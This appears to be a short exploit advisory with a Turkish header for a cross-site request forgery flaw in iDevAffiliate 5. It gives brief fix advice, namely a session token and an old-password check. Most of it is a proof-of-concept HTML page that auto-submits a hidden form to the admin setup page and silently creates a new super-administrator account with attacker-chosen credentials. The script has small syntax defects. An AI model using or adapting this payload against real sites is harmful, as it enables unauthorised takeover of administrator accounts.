< ------------------- header data start ------------------- >

#############################################################

# Application Name : iDevAffiliate 5

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form method=POST action=http://www.Site.com/admin/setup.php>
<input type=hidden name=action value=11>
<input type=hidden name=new value=1>

<input type=hidden name=newuser size=10 value=bizo >
<input type=hidden name=newpass size=10 value=bizo>
<input type=hidden name=newsuper value=1 value=bizo>

<input type=submit value=create name=B1>


< -- bug code end of -- >